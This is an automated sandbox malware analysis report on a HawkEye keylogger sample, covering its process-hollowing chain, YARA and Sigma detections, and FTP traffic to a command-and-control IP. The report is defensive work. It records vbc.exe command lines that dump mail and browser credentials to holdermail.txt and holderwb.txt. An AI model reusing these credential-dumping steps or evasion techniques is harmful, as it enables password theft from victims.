
Windows Analysis Report ypBoHI5G3x

Overview

General Information

Sample Name: ypBoHI5G3x (renamed file extension from none to exe)
Analysis ID: 454641
MD5: 08d679d4b9a12137756cc9244bd6f017
SHA1: 580c29bc356057d76873c9c453ed466e1024b7f2
SHA256: 047f33e6f83796d9fc056d7006a6e8ef69696d63eceb29fb1592bb13a62e79bf
Tags: 32, exe, trojan

Detection

HawkEye, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w10x64
  • ypBoHI5G3x.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\ypBoHI5G3x.exe' MD5: 08D679D4B9A12137756CC9244BD6F017)
    • InstallUtil.exe (PID: 6456 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • vbc.exe (PID: 5560 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 5432 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings are listed under each row)
0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x37e24:$hawkstr1: HawkEye Keylogger
  • 0x3b150:$hawkstr1: HawkEye Keylogger
  • 0x3b4d0:$hawkstr1: HawkEye Keylogger
  • 0x3d994:$hawkstr1: HawkEye Keylogger
  • 0x378dc:$hawkstr2: Dear HawkEye Customers!
  • 0x3b1b0:$hawkstr2: Dear HawkEye Customers!
  • 0x3b530:$hawkstr2: Dear HawkEye Customers!
  • 0x37a0a:$hawkstr3: HawkEye Logger Details:
00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0xfdd61:$key: HawkEyeKeylogger
  • 0x17fe1f:$key: HawkEyeKeylogger
  • 0x2022ff:$key: HawkEyeKeylogger
  • 0xfff5f:$salt: 099u787978786
  • 0x18201d:$salt: 099u787978786
  • 0x2044fd:$salt: 099u787978786
  • 0xfe37a:$string1: HawkEye_Keylogger
  • 0xff1cd:$string1: HawkEye_Keylogger
  • 0xffebf:$string1: HawkEye_Keylogger
  • 0x180438:$string1: HawkEye_Keylogger
  • 0x18128b:$string1: HawkEye_Keylogger
  • 0x181f7d:$string1: HawkEye_Keylogger
  • 0x202918:$string1: HawkEye_Keylogger
  • 0x20376b:$string1: HawkEye_Keylogger
  • 0x20445d:$string1: HawkEye_Keylogger
  • 0xfe763:$string2: holdermail.txt
  • 0xfe783:$string2: holdermail.txt
  • 0x180821:$string2: holdermail.txt
  • 0x180841:$string2: holdermail.txt
  • 0x202d01:$string2: holdermail.txt
  • 0x202d21:$string2: holdermail.txt

Unpacked PEs

Source | Rule | Description | Author (matched strings are listed under each row)
12.2.InstallUtil.exe.7750000.11.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
12.2.InstallUtil.exe.2b6ec2c.6.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
12.2.InstallUtil.exe.3b39930.7.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
12.2.InstallUtil.exe.45fa72.2.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
19.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\Desktop\ypBoHI5G3x.exe', ParentImage: C:\Users\user\Desktop\ypBoHI5G3x.exe, ParentProcessId: 6504, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 6456

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: ypBoHI5G3x.exe.6504.1.memstr; Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: ypBoHI5G3x.exe; Virustotal: Detection: 28%
Source: ypBoHI5G3x.exe; ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: ypBoHI5G3x.exe; Joe Sandbox ML: detected
Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack; Avira: Label: TR/Inject.vcoldi
Source: 12.2.InstallUtil.exe.400000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 12.2.InstallUtil.exe.400000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack; Avira: Label: TR/Inject.vcoldi
Source: ypBoHI5G3x.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown; HTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.6:49723 version: TLS 1.0
Source: ypBoHI5G3x.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb; source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll; source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599966159.00000000008B2000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb; source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb; source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
Source: Binary string: InstallUtil.pdb; source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp; Binary or memory string: autorun.inf
Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp; Binary or memory string: [autorun]
Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp; Binary or memory string: autorun.inf
Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp; Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 18_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 18_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 19_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then jmp 05FF51E0h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then jmp 05FF51E0h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe; Code function: 4x nop then jmp 0516A630h
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe; Code function: 4x nop then jmp 0516A630h
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.6:49759 -> 45.141.152.18:21
Source: global traffic; TCP traffic: 192.168.2.6:49760 -> 45.141.152.18:62998
Source: Joe Sandbox View; IP Address: 45.141.152.18
Source: Joe Sandbox View; ASN Name: M247GB
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; FTP traffic detected: 45.141.152.18:21 -> 192.168.2.6:49759, server banner:
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 05:13. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Source: unknown; HTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.6:49723 version: TLS 1.0
Source: vbc.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown; DNS traffic detected: queries for: www.google.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected HawkEye Keylogger
            Source: Yara match | File source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Contains functionality to log keystrokes (.Net Source)
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: HookKeyboard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large array initializations
            Source: ypBoHI5G3x.exe, n6QE/Nx78.cs | Large array initialization: .cctor: array initializer size 7987
            Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, n6QE/Nx78.cs | Large array initialization: .cctor: array initializer size 7987
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA5CBC CreateProcessAsUserW,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF51F7
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF0040
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FFF378
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FFB240
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FFB230
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF2DE8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF2DD8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FFAC90
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FFAC7F
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF4968
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA7F50
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DABF48
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA5470
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA6C29
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA9A10
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAE958
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAA141
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA6130
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA5461
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAF588
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DACA88
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAB3C8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAB3B8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA2370
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA2360
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAB840
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAD810
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DAB833
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA3998
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA3996
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_06DA3958
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_008B20B0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516F90C
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516F934
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516F958
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516F940
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516F94C
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_05175EDF
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0517CA22
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0517BA60
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_073AB4E0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_073AEEC8
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_073ABDB0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_073AB198
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_073A0006
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404419
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404516
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00413538
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_004145A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_0040E639
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_004337AF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_004399B1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_0043DAE7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00405CF6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00403F85
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00411F99
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_00404DDB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_0040BD8A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_00404E4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_00404EBD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_00404F4E
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
